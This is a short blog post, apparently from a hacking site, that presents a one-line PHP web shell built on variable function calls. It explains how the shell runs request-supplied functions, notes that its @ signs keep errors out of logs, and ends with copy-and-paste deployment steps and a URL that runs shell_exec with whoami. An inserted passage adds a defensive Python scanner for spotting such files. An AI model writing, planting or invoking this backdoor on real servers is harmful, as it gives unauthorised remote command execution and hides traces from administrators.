Tiny php shell



Have you ever needed a small shell written in PHP?
Of course you have. But I bet it hasn't been all too stealthy!

This is really pointless, but someone might be interested in it.
So here you go folks!

<?=($_=@$_GET[2]).@$_($_GET[1])?>

It doesn't look like much so let me explain.

PHP allows strings to be interpreted as function calls.
That's a major part of how callbacks in PHP work.

Example:

<?php

$array = array(1,2,3);

// The callback is passed by name, as a plain string.
array_walk($array, 'f');

// Prints each element multiplied by two.
function f($x){echo $x * 2;}

?>

In the preceding example, array_walk() iterates through the array $array and applies the function f() to each and every element in the list.
The function f() prints out each value from the array multiplied by two.
The output results in: 246.

The fun thing is, if you look at how the callback f() is applied - it's by a simple string. (Look at argument #2 in the first function call, array_walk().)

What does that mean?
Well, to put it short, you're able to take a string - and execute it as a function name.
Now, let's try something... fuzzier...

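<?php

// A string holding a function name...
$fuzz = 'phpinfo';

// ...called as if the variable were the function itself.
$fuzz();

?>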

What might this do?
Will it execute?
Damn right.

Now let's tear my tiny code apart.
It's made out of two parts.

  1. $_=@$_GET[2]
  2. @$_($_GET[1])

The first part takes the value from the GET-variable 2 and stores it in the temporary variable $_.
The second part takes our temporary variable $_, and executes it with the GET-variable 1 as its one-and-only argument.

The @'s are only there to suppress notices, warnings and/or fatals from showing up in logs, to the user or whatever else that might catch them.
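
For anyone reviewing a webroot for files like this, the two traits described above (a call made through a variable, and a callee that comes from request input) can be searched for. The following is an added example, not code from the original post: a heuristic Python scanner whose names (scan_php, triage, SAMPLES) and sample file names are assumptions made for illustration.

```python
import re

# Superglobals whose contents come from the HTTP request.
REQUEST_VARS = ("_GET", "_POST", "_REQUEST", "_COOKIE", "_FILES", "_SERVER")
# $name = [@]$_GET...   -> $name now holds request input
ASSIGN = re.compile(r"\$(\w+)\s*=\s*@?\s*\$(?:%s)\b" % "|".join(REQUEST_VARS))
# [@]$name[...](        -> a call through a variable ("variable function")
CALL = re.compile(r"(@?)\s*\$(\w+)((?:\s*\[[^\]]*\])*)\s*\(")


def scan_php(source):
    """Return one finding per call made through a variable in PHP source.

    Regex heuristic, not a PHP parser: taint tracking is per file and
    ignores statement order, so treat hits as leads for manual review.
    """
    tainted = {m.group(1) for m in ASSIGN.finditer(source)}
    findings = []
    for m in CALL.finditer(source):
        name = m.group(2)
        findings.append({
            "line": source.count("\n", 0, m.start(2)) + 1,
            "callee": "$" + name + m.group(3),
            # Callee is a request superglobal or was assigned from one.
            "request_controlled": name in REQUEST_VARS or name in tainted,
            # '@' hides the warnings a failed call would otherwise produce.
            "suppressed": m.group(1) == "@",
        })
    return findings


# Constructed sample files; the bodies are the snippets shown on this page.
SAMPLES = {
    "tiny.php": "<?=($_=@$_GET[2]).@$_($_GET[1])?>",
    "fuzz.php": "<?php\n$fuzz = 'phpinfo';\n$fuzz();\n",
    "walk.php": "<?php\n$array = array(1,2,3);\narray_walk($array, 'f');\n"
                "function f($x){echo $x * 2;}\n",
}


def triage(samples):
    """Map file name -> findings whose callee is request-controlled."""
    hits = {}
    for fname, src in samples.items():
        risky = [f for f in scan_php(src) if f["request_controlled"]]
        if risky:
            hits[fname] = risky
    return hits


if __name__ == "__main__":
    for fname, found in triage(SAMPLES).items():
        print(fname, found)
```

Only tiny.php is reported by triage(); the $fuzz() call is still returned by scan_php() as a variable-function call, but with request_controlled set to False.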

Conclusion: Copy and paste the snippet, and store it in a PHP-file.
Execute a shell by going to: copypaste.php?1=shell_exec&2=whoami

The response should be something like:
apache
...or as on Windows if you're running your server as a service:
nt authority/system.

Conclusion: PHP is fun!

Ciao!



http://h.ackack.net/tiny-php-shell.html

http://www.thespanner.co.uk/2011/09/22/non-alphanumeric-code-in-php/


